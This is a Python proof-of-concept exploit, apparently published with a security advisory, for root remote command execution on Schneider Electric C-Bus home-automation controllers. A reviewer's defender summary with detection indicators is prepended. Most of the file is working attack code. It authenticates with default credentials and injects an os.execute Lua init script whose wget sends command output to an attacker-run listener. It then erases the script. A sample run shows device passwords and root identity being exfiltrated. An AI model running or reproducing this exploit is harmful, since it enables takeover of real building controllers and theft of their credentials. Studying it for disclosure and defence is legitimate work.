# Summary: The C-Bus Network Automation Controller (5500NAC) and the Wiser
# for C-Bus Automation Controller (5500SHAC)) is an advanced controller from
# Schneider Electric. It is specifically designed to unite the C-Bus home
# automation solution with common household communication protocols, from
# lighting and climate control, to security, entertainment and energy metering.
# The Wiser for C-Bus Automation Controller manages and controls C-Bus systems
# for residential homes or zones within a building and integrates functions
# such as heating/cooling, energy/load monitoring and remote control for C-Bus
# and Modbus.
#
# Desc: The automation controller suffers from an authenticated arbitrary
# command execution vulnerability. An attacker can abuse the Start-up (init)
# script editor and exploit the 'script' POST parameter to insert malicious
# Lua script code and execute commands with root privileges that will grant
# full control of the device.
#
# ------------------------------------------------------------------------------
# $ ./c-bus.py http://192.168.0.10 "cat /etc/config/httpd;id" 192.168.0.37 8888
# ----------------------------------------------------------------------
# Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at 15.03.2022 11:26:38
# [*] Starting exfiltration handler on port 8888
# [*] Writing Lua initscript... done.
# [*] Running os.execute()... done.
# [*] Got request from 192.168.0.10:33522
# [*] Printing target's request:
#
# b"GET / HTTP/1.1\r\nHost: 192.168.0.37:8888\r\nUser-Agent: \nconfig user
# 'admin'\n\toption password 'admin123'\n\nconfig user 'remote'\n\toption
# password 'remote'\n\nuid=0(root) gid=0(root) groups=0(root)\r\nConnection:
# close\r\n\r\n"
#
# [*] Cleaning up... done.
#
# $
# ------------------------------------------------------------------------------
#
# Tested on: CPU model: ARM926EJ-S rev 5 (v5l)
#            GNU/Linux 4.4.115 (armv5tejl)
#            LuaJIT 2.0.5
#            FlashSYS v2
#            nginx
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2022-5707
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5707.php
#
#
# 12.03.2022
#
# NOTE(review): this listing had been collapsed onto a few long lines; the
# layout below is reconstructed from statement order. The ASCII-art banner
# in splash() is kept exactly as it appears in the listing.
#
# Defender's summary: two authenticated POSTs to /scada-main/scripting/save
# and /scada-main/scripting/run store and execute a Lua init script whose
# body is `os.execute('wget -U "`<cmd>`" <lhost>:<lport>')`, i.e. the
# controller itself makes an outbound HTTP request to the operator's
# listener with the command output in its User-Agent header. Indicators:
# saves of the "initscript" editor whose script field contains os.execute,
# and outbound HTTP from the controller to an unexpected host. Egress
# filtering for the controller and non-default admin credentials cut both
# the exfiltration channel and the precondition the PoC relies on.

import threading#!
import datetime##!
import requests##!
import socket####!
import time######!
import sys#######!
import re########!
from requests.auth import HTTPBasicAuth
from time import sleep as spikaj


class Wiser:
    """Driver for the PoC: argument parsing, a listener thread and the two HTTP calls."""

    def __init__(self):
        self.headers = None
        self.uri = '/scada-main/scripting/'
        self.savs = self.uri + 'save'
        self.runs = self.uri + 'run'
        self.start = datetime.datetime.now()
        self.start = self.start.strftime('%d.%m.%Y %H:%M:%S')
        # Credentials are hard-coded to the device default used in the sample run.
        self.creds = HTTPBasicAuth('admin', 'admin123')

    def memo(self):
        """Read target, command, listener host and port from argv, or show usage and exit."""
        if len(sys.argv) != 5:
            self.use()
        else:
            self.target = sys.argv[1]
            self.execmd = sys.argv[2]
            self.localh = sys.argv[3]
            self.localp = int(sys.argv[4])
            # Substring test: any target containing "http" is left untouched.
            if not 'http' in self.target:
                self.target = 'http://{}'.format(self.target)

    def exfil(self):
        """Listen on 0.0.0.0:<lport> and print the first 2003 bytes of each incoming connection.

        Runs on a worker thread (see mtask). Each accept() waits at most 9
        seconds; on timeout the loop ends, the socket is closed and clean()
        is invoked from this thread. The accepted connection `conn` is
        never closed explicitly.
        """
        print('[*] Starting exfiltration handler on port {}'.format(self.localp))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(('0.0.0.0', self.localp))
        while True:
            try:
                s.settimeout(9)
                s.listen(1)
                conn, addr = s.accept()
                print('[*] Got request from {}:{}'.format(addr[0], addr[1]))
                data = conn.recv(2003)
                print('[*] Printing target\'s request:')
                print('\n%s' %data)
            except socket.timeout as p:
                print('[!] Something\'s not right. Check your port mappings!')
                break
        s.close()
        self.clean()

    def mtask(self):
        """Start the listener thread, then send the requests from the main thread."""
        konac = threading.Thread(name='thricer.exe', target=self.exfil)
        konac.start()
        self.byts()

    def byts(self):
        """Save the Lua init script via /scripting/save, then trigger it via /scripting/run.

        `self.loada` is the form body for the save call, assembled from
        hex-escaped fragments (decoded in the trailing comments); the
        operator-supplied command is spliced in unmodified. `self.loadb`
        selects the same script for the run call. Each call exits the
        process with a distinct code if the response lacks 'success'.
        """
        self.headers = {
            'Referer':self.target+'/scada-main/main/editor?id=initscript',
            'Sec-Ch-Ua':'"(Not(A:Brand";v="8", "Chromium";v="98"',
            'Cookie':'x-logout=0; x-auth=; x-login=1; pin=',
            'Content-Type':'text/plain;charset=UTF-8',
            'User-Agent':'SweetHomeAlabama/2003.59',
            'X-Requested-With':'XMLHttpRequest',
            'Accept-Language':'en-US,en;q=0.9',
            'Accept-Encoding':'gzip, deflate',
            'Sec-Ch-Ua-Platform':'"Windows"',
            'Sec-Fetch-Site':'same-origin',
            'Connection':'keep-alive',
            'Sec-Fetch-Dest':'empty',
            'Sec-Ch-Ua-Mobile':'?0',
            'Sec-Fetch-Mode':'cors',
            'Origin':self.target,
            'Accept':'*/*',
            'sec-gpc':'1'
        }
        self.loada = '\x64\x61\x74\x61\x3D\x7B' # data={
        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x34\x22\x3A\x22\x22\x2C' # "ext-comp-1004":"",
        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35\x22\x3A\x22\x22\x2C' # "ext-comp-1005":"",
        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x22\x3A\x22\x22\x2C' # "ext-comp-1006":"",
        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x37\x22\x3A\x22\x22\x2C' # "ext-comp-1007":"",
        self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x38\x22\x3A\x22\x22\x2C' # "ext-comp-1008":"",
        self.loada += '\x22\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70\x2D\x73\x65\x61\x72\x63\x68\x22\x3A\x22\x22\x2C' # "scada-help-search":"",
        self.loada += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x2C' # "id":"initscript",
        self.loada += '\x22\x73\x63\x72\x69\x70\x74\x22\x3A\x6E\x75\x6C\x6C\x2C' # "script":null,
        self.loada += '\x22\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C\x79\x22\x3A\x22\x74\x72\x75\x65\x22\x7D' # "scriptonly":"true"}
        self.loada += '\x26\x73\x63\x72\x69\x70\x74\x3D\x6F\x73\x2E\x65\x78\x65\x63\x75\x74\x65' # &script=os.execute
        self.loada += '\x28\x27\x77\x67\x65\x74\x20\x2D\x55\x20\x22\x60' # ('wget -U "`
        self.loada += self.execmd # [command input]
        self.loada += '\x60\x22\x20' # `".
        self.loada += self.localh+':'+str(self.localp) # [listener input]
        self.loada += '\x27\x29' # ')
        self.loadb = '\x64\x61\x74\x61\x3D\x7B' # data={
        self.loadb += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x7D' # "id":"initscript"}
        print('[*] Writing Lua initscript... ', end='')
        sys.stdout.flush()
        spikaj(0.7)
        htreq = requests.post(self.target+self.savs, data=self.loada, headers=self.headers, auth=self.creds)
        if not 'success' in htreq.text:
            print('didn\'t work!')
            exit(17)
        else:
            print('done.')
        print('[*] Running os.execute()... ', end='')
        sys.stdout.flush()
        spikaj(0.7)
        htreq = requests.post(self.target+self.runs, data=self.loadb, headers=self.headers, auth=self.creds)
        if not 'success' in htreq.text:
            print('didn\'t work!')
            exit(19)
        else:
            print('done.')

    def splash(self):
        """Print the ASCII-art banner (kept on one line as in the listing)."""
        Baah_loon = ''' ###### ########## ###### _\_ ##===----[.].] #( , _\\ # )\__| \ / `-._``-' >@ | | | | | Schneider Electric C-Bus SmartHome Automation Controller | Root Remote Code Execution Proof of Concept | ZSL-2022-5707 | | | '''
        print(Baah_loon)

    def use(self):
        """Show banner and usage, then exit 0."""
        self.splash()
        print('Usage: ./c-bus.py [target] [cmd] [lhost] [lport]')
        exit(0)

    def clean(self):
        """Overwrite the init script with an empty one via /scripting/save, then exit.

        `self.clear` is the percent-encoded form of
        data={"ext-comp-1004":"",...,"id":"initscript","script":"","scriptonly":"true"}
        (decoded from the hex fragments below), i.e. the saved script body is
        emptied. Always finishes with exit(-1), even after 'done.'; and since
        this is called from the listener thread (see exfil), the SystemExit
        raised by exit() ends that thread rather than the whole process -
        NOTE(review): confirm this matches the intended behaviour.
        """
        print('\n[*] Cleaning up... ', end='')
        sys.stdout.flush()
        spikaj(0.7)
        self.headers = {'X-Requested-With':'XMLHttpRequest'}
        self.blank = '\x64\x61\x74\x61\x3D\x25\x37\x42\x25\x32\x32'
        self.blank += '\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30'
        self.blank += '\x30\x34\x25\x32\x32\x25\x33\x41\x25\x32\x32'
        self.blank += '\x25\x32\x32\x25\x32\x43\x25\x32\x32\x65\x78'
        self.dlank = '\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35'
        self.dlank += '\x25\x32\x32\x25\x33\x41\x25\x32\x32\x25\x32'
        self.dlank += '\x32\x25\x32\x43\x25\x32\x32\x65\x78\x74\x2D'
        self.dlank += '\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x25\x32'
        self.clank = '\x32\x25\x33\x41\x25\x32\x32\x25\x32\x32\x25'
        self.clank += '\x32\x43\x25\x32\x32\x65\x78\x74\x2D\x63\x6F'
        self.clank += '\x6D\x70\x2D\x31\x30\x30\x37\x25\x32\x32\x25'
        self.clank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'
        self.slank = '\x25\x32\x32\x65\x78\x74\x2D\x63\x6F\x6D\x70'
        self.slank += '\x2D\x31\x30\x30\x38\x25\x32\x32\x25\x33\x41'
        self.slank += '\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25\x32'
        self.slank += '\x32\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70'
        self.glank = '\x2D\x73\x65\x61\x72\x63\x68\x25\x32\x32\x25'
        self.glank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'
        self.glank += '\x25\x32\x32\x69\x64\x25\x32\x32\x25\x33\x41'
        self.glank += '\x25\x32\x32\x69\x6E\x69\x74\x73\x63\x72\x69'
        self.hlank = '\x70\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32'
        self.hlank += '\x73\x63\x72\x69\x70\x74\x25\x32\x32\x25\x33'
        self.hlank += '\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25'
        self.hlank += '\x32\x32\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C'
        self.flank = '\x79\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74'
        self.flank += '\x72\x75\x65\x25\x32\x32\x25\x37\x44'#######'
        self.clear = f'{self.blank}{self.dlank}{self.clank}{self.slank}{self.glank}{self.hlank}{self.flank}'
        htreq = requests.post(self.target+self.savs, data=self.clear, headers=self.headers, auth=self.creds)
        if not 'success' in htreq.text:
            print('didn\'t work!')
            exit(18)
        else:
            print('done.')
        exit(-1)

    def main(self):
        """Print the header line, parse arguments, start the listener and send the requests."""
        print('-'*70)
        print('Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at', self.start)
        self.memo(), self.mtask()


if __name__ == '__main__':
    Wiser().main()